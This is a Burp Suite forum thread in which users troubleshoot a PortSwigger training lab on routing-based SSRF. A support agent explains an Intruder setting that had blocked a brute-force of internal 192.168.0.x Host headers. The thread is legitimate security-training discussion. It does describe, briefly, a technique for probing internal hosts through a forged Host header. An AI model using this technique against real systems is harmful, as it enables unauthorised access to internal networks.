Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Lab: Routing-based SSRF

Dsca | Last updated: Feb 15, 2022 07:56AM UTC

Hello, I've tried to solve this lab - Lab: Routing-based SSRF. When I try to brute the last octet in 192.168.0.0 ip I always get the 200 http response. I've checked it many times: Send Get / to intuder --> click the 'clear' button --> add a payload position 192.168.0.§0§ --> go to payloads tab --> select "numbers" type --> from 0 to 255 step 1. Start atack. So as I said intruder give me only http 200 and (which is more strange) in these 255 reqests the Host header isn't change. I mean I have this in position tab: GET / HTTP/1.1 Host: 192.168.0.§0§ But burp sends 255 requests with that header: GET / HTTP/1.1 Host: aca21fa01f7e75fbc0ef0f9f0048006f.web-security-academy.net I don't know what's going on.

Ben, PortSwigger Agent | Last updated: Feb 15, 2022 09:46AM UTC

Hi, That sounds rather strange - are you able to email us at support@portswigger.net and include some screenshots of the setup that you have in Intruder and the results that you are seeing? Having just run through the lab now, it works as expected for me so it would be useful to see exactly what is happening when you try this.

Dsca | Last updated: Feb 17, 2022 06:29AM UTC

I'm sorry this is my fault. I forgot disable "Update Host header to match target" option.

Ben, PortSwigger Agent | Last updated: Feb 17, 2022 08:21AM UTC

Not a problem - glad you were able to solve it in the end!

Erin | Last updated: May 26, 2022 08:57PM UTC

https://forum.portswigger.net/thread/lab-routing-based-ssrf-4b06e7e3c52b7

Erin | Last updated: May 26, 2022 08:58PM UTC

Sorry, wrong copy/paste. I am getting this same 200 result in the Intruder. Where is the setting for "Update Host header to match target" option? I cannot find this to disable it in Burp to retry the attack.

Ben, PortSwigger Agent | Last updated: May 27, 2022 06:58AM UTC

Hi, Assuming that you are using one of the later versions of Burp, the 'Update Host header to match target' checkbox is in the Positions sub-tab of your Intruder attack. I have highlighted this option in the screenshot accessible below: https://snipboard.io/kBMK6v.jpg

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.